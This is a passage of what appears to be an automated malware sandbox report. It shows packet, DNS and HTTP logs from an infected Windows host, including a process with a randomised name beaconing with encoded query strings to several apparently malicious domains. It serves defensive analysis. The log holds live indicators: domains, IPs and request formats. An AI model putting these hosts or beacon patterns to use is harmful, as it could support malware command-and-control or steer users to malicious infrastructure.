Oct 15, 2024 09:15:39.554985046 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.555042982 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.555042982 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.555049896 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.555088043 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.555759907 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.555816889 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.556323051 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.556376934 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.557180882 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.557228088 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.557250023 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.557255030 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.557302952 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.586678982 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.586747885 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.586774111 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.586782932 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.586832047 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.587151051 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.587239981 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.587256908 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.587317944 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.587445974 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.587502003 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.587775946 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.587840080 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.588401079 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.588471889 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.657963037 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.658090115 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.658092022 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.658104897 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.658150911 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.658231020 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.658286095 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.658699989 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.658770084 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.658771038 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.658816099 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.658879995 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.658900023 CEST	443	49973	77.105.36.128	192.168.2.9
Oct 15, 2024 09:15:39.658912897 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:15:39.658946991 CEST	49973	443	192.168.2.9	77.105.36.128
Oct 15, 2024 09:16:35.304050922 CEST	62041	80	192.168.2.9	194.58.112.174
Oct 15, 2024 09:16:35.309014082 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:35.309211016 CEST	62041	80	192.168.2.9	194.58.112.174
Oct 15, 2024 09:16:35.325135946 CEST	62041	80	192.168.2.9	194.58.112.174
Oct 15, 2024 09:16:35.330265045 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:35.979876995 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:35.979906082 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:35.979908943 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:35.979912996 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:35.979932070 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:35.979942083 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:35.979954004 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:35.979965925 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:35.979978085 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:35.980437040 CEST	62041	80	192.168.2.9	194.58.112.174
Oct 15, 2024 09:16:35.980539083 CEST	62041	80	192.168.2.9	194.58.112.174
Oct 15, 2024 09:16:36.092394114 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:36.092799902 CEST	62041	80	192.168.2.9	194.58.112.174
Oct 15, 2024 09:16:36.094799042 CEST	62041	80	192.168.2.9	194.58.112.174
Oct 15, 2024 09:16:36.099695921 CEST	80	62041	194.58.112.174	192.168.2.9
Oct 15, 2024 09:16:51.689237118 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:51.695528984 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:51.696698904 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:51.708087921 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:51.714344978 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.208506107 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.208539009 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.208553076 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.208570004 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.208581924 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.208591938 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.208595037 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:52.208623886 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.208636999 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.208647013 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:52.208651066 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.208662033 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.208673954 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:52.208697081 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:52.213709116 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.213723898 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.213736057 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.213763952 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:52.229809999 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.229863882 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:52.229907036 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.280870914 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:52.296101093 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.296135902 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.296147108 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.296175003 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:52.296334028 CEST	80	62042	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:52.296372890 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:53.218525887 CEST	62042	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:54.252866983 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:54.257764101 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.257838964 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:54.271359921 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:54.276176929 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.778960943 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.778983116 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.778997898 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.779007912 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.779019117 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.779028893 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.779042006 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.779051065 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.779062033 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.779083967 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:54.779098988 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.779154062 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:54.783955097 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.783970118 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.783982038 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.784054995 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:54.798793077 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.798830986 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.798856974 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:54.843435049 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:54.866094112 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.866110086 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.866174936 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:54.866177082 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.866188049 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.866228104 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:54.866245985 CEST	80	62043	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:54.866287947 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:55.781049967 CEST	62043	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:56.954437971 CEST	62044	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:56.959364891 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:56.959465981 CEST	62044	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:56.970670938 CEST	62044	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:56.975625038 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:56.975749016 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.480428934 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.480453968 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.480465889 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.480496883 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.480506897 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.480518103 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.480540037 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.480551958 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.480562925 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.480566025 CEST	62044	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:57.480613947 CEST	62044	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:57.480632067 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.480669975 CEST	62044	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:57.485409975 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.485455990 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.485518932 CEST	62044	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:57.500459909 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.500471115 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.500529051 CEST	62044	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:57.568726063 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.568739891 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.568751097 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.568840027 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.569020033 CEST	62044	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:57.569489002 CEST	80	62044	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:57.569547892 CEST	62044	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:58.484190941 CEST	62044	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:59.576961040 CEST	62045	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:59.581857920 CEST	80	62045	216.40.34.41	192.168.2.9
Oct 15, 2024 09:16:59.581959009 CEST	62045	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:59.589140892 CEST	62045	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:16:59.593926907 CEST	80	62045	216.40.34.41	192.168.2.9
Oct 15, 2024 09:17:00.072474003 CEST	80	62045	216.40.34.41	192.168.2.9
Oct 15, 2024 09:17:00.072510004 CEST	80	62045	216.40.34.41	192.168.2.9
Oct 15, 2024 09:17:00.072520971 CEST	80	62045	216.40.34.41	192.168.2.9
Oct 15, 2024 09:17:00.072530985 CEST	80	62045	216.40.34.41	192.168.2.9
Oct 15, 2024 09:17:00.072536945 CEST	80	62045	216.40.34.41	192.168.2.9
Oct 15, 2024 09:17:00.072547913 CEST	80	62045	216.40.34.41	192.168.2.9
Oct 15, 2024 09:17:00.072559118 CEST	80	62045	216.40.34.41	192.168.2.9
Oct 15, 2024 09:17:00.072863102 CEST	62045	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:17:00.072863102 CEST	62045	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:17:00.092870951 CEST	80	62045	216.40.34.41	192.168.2.9
Oct 15, 2024 09:17:00.093105078 CEST	62045	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:17:00.094170094 CEST	62045	80	192.168.2.9	216.40.34.41
Oct 15, 2024 09:17:00.099782944 CEST	80	62045	216.40.34.41	192.168.2.9
Oct 15, 2024 09:17:05.151650906 CEST	62046	80	192.168.2.9	3.33.130.190
Oct 15, 2024 09:17:05.156543970 CEST	80	62046	3.33.130.190	192.168.2.9
Oct 15, 2024 09:17:05.156687975 CEST	62046	80	192.168.2.9	3.33.130.190
Oct 15, 2024 09:17:05.175283909 CEST	62046	80	192.168.2.9	3.33.130.190
Oct 15, 2024 09:17:05.180267096 CEST	80	62046	3.33.130.190	192.168.2.9
Oct 15, 2024 09:17:05.607819080 CEST	80	62046	3.33.130.190	192.168.2.9
Oct 15, 2024 09:17:05.607903957 CEST	62046	80	192.168.2.9	3.33.130.190
Oct 15, 2024 09:17:06.687328100 CEST	62046	80	192.168.2.9	3.33.130.190
Oct 15, 2024 09:17:06.692349911 CEST	80	62046	3.33.130.190	192.168.2.9
Oct 15, 2024 09:17:08.176604986 CEST	62047	80	192.168.2.9	3.33.130.190
Oct 15, 2024 09:17:08.181668043 CEST	80	62047	3.33.130.190	192.168.2.9
Oct 15, 2024 09:17:08.184676886 CEST	62047	80	192.168.2.9	3.33.130.190
Oct 15, 2024 09:17:08.195472956 CEST	62047	80	192.168.2.9	3.33.130.190
Oct 15, 2024 09:17:08.200501919 CEST	80	62047	3.33.130.190	192.168.2.9
Oct 15, 2024 09:17:08.639853001 CEST	80	62047	3.33.130.190	192.168.2.9
Oct 15, 2024 09:17:08.640609026 CEST	62047	80	192.168.2.9	3.33.130.190

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 15, 2024 09:14:58.747941017 CEST	64350	53	192.168.2.9	1.1.1.1
Oct 15, 2024 09:14:58.758279085 CEST	53	64350	1.1.1.1	192.168.2.9
Oct 15, 2024 09:15:02.007261038 CEST	57369	53	192.168.2.9	1.1.1.1
Oct 15, 2024 09:15:02.102246046 CEST	53	57369	1.1.1.1	192.168.2.9
Oct 15, 2024 09:15:42.147351980 CEST	53	56098	162.159.36.2	192.168.2.9
Oct 15, 2024 09:15:42.660062075 CEST	53	50611	1.1.1.1	192.168.2.9
Oct 15, 2024 09:16:35.183785915 CEST	57914	53	192.168.2.9	1.1.1.1
Oct 15, 2024 09:16:35.285141945 CEST	53	57914	1.1.1.1	192.168.2.9
Oct 15, 2024 09:16:51.207870007 CEST	54578	53	192.168.2.9	1.1.1.1
Oct 15, 2024 09:16:51.577274084 CEST	53	54578	1.1.1.1	192.168.2.9
Oct 15, 2024 09:17:05.129142046 CEST	64954	53	192.168.2.9	1.1.1.1
Oct 15, 2024 09:17:05.147186041 CEST	53	64954	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 15, 2024 09:14:58.747941017 CEST	192.168.2.9	1.1.1.1	0x79d7	Standard query (0)	aszzzw_6777.6777.6777.677e	A (IP address)	IN (0x0001)	false
Oct 15, 2024 09:15:02.007261038 CEST	192.168.2.9	1.1.1.1	0xaeb	Standard query (0)	promenter.rs	A (IP address)	IN (0x0001)	false
Oct 15, 2024 09:16:35.183785915 CEST	192.168.2.9	1.1.1.1	0x3838	Standard query (0)	www.svarus.online	A (IP address)	IN (0x0001)	false
Oct 15, 2024 09:16:51.207870007 CEST	192.168.2.9	1.1.1.1	0xfd11	Standard query (0)	www.newhopetoday.app	A (IP address)	IN (0x0001)	false
Oct 15, 2024 09:17:05.129142046 CEST	192.168.2.9	1.1.1.1	0xee61	Standard query (0)	www.ladylawher.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 15, 2024 09:14:53.221402884 CEST	1.1.1.1	192.168.2.9	0xd3dc	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 15, 2024 09:14:53.221402884 CEST	1.1.1.1	192.168.2.9	0xd3dc	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Oct 15, 2024 09:14:58.758279085 CEST	1.1.1.1	192.168.2.9	0x79d7	Name error (3)	aszzzw_6777.6777.6777.677e	none	none	A (IP address)	IN (0x0001)	false
Oct 15, 2024 09:15:02.102246046 CEST	1.1.1.1	192.168.2.9	0xaeb	No error (0)	promenter.rs		77.105.36.128	A (IP address)	IN (0x0001)	false
Oct 15, 2024 09:16:35.285141945 CEST	1.1.1.1	192.168.2.9	0x3838	No error (0)	www.svarus.online		194.58.112.174	A (IP address)	IN (0x0001)	false
Oct 15, 2024 09:16:51.577274084 CEST	1.1.1.1	192.168.2.9	0xfd11	No error (0)	www.newhopetoday.app		216.40.34.41	A (IP address)	IN (0x0001)	false
Oct 15, 2024 09:17:05.147186041 CEST	1.1.1.1	192.168.2.9	0xee61	No error (0)	www.ladylawher.org	ladylawher.org		CNAME (Canonical name)	IN (0x0001)	false
Oct 15, 2024 09:17:05.147186041 CEST	1.1.1.1	192.168.2.9	0xee61	No error (0)	ladylawher.org		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 15, 2024 09:17:05.147186041 CEST	1.1.1.1	192.168.2.9	0xee61	No error (0)	ladylawher.org		15.197.148.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

promenter.rs

www.svarus.online

www.newhopetoday.app

www.ladylawher.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	62041	194.58.112.174	80	6240	C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 09:16:35.325135946 CEST	413	OUT	GET /sa87/?1DbH=RRW4t2_hkFqt&w2h=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8EnOz0KyJHucPzLziv8XmKKnO8TJ+EQ== HTTP/1.1 Host: www.svarus.online Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Oct 15, 2024 09:16:35.979876995 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 15 Oct 2024 07:16:35 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 34 65 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 76 61 72 75 73 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 [TRUNCATED] Data Ascii: 24e1<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.svarus.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg.ru" [TRUNCATED]
Oct 15, 2024 09:16:35.979906082 CEST	1236	IN	Data Raw: 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f Data Ascii: div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.svarus.online</h1><p class="b-parking__header-d
Oct 15, 2024 09:16:35.979908943 CEST	1236	IN	Data Raw: bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"><
Oct 15, 2024 09:16:35.979912996 CEST	1236	IN	Data Raw: 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 70 72 69 6d 61 72 79 20 62 2d Data Ascii: div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_
Oct 15, 2024 09:16:35.979932070 CEST	848	IN	Data Raw: 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 Data Ascii: campaign=s_land_server&reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_sitebuilder"><strong class="b-title b-title_size_large-compact"> </str
Oct 15, 2024 09:16:35.979942083 CEST	1236	IN	Data Raw: d0 b8 d1 84 d0 b8 d0 ba d0 b0 d1 82 20 d0 b1 d0 b5 d1 81 d0 bf d0 bb d0 b0 d1 82 d0 bd d0 be 20 d0 bd d0 b0 26 6e 62 73 70 3b 36 20 d0 bc d0 b5 d1 81 d1 8f d1 86 d0 b5 d0 b2 20 3c 2f 73 74 72 6f 6e 67 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 Data Ascii:  6 </strong><a class="b-button b-button_color_reference b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_ssl" href="https://help.reg.ru/supp
Oct 15, 2024 09:16:35.979954004 CEST	1236	IN	Data Raw: 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 64 61 74 61 2e 72 65 66 5f 69 64 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6c 69 6e 6b Data Ascii: return; } if ( data.ref_id ) { var links = document.querySelectorAll( 'a' ); for ( var i = 0; i < links.length; i++) { if ( links[ i ].href.indexOf('?') >= 0 ) {
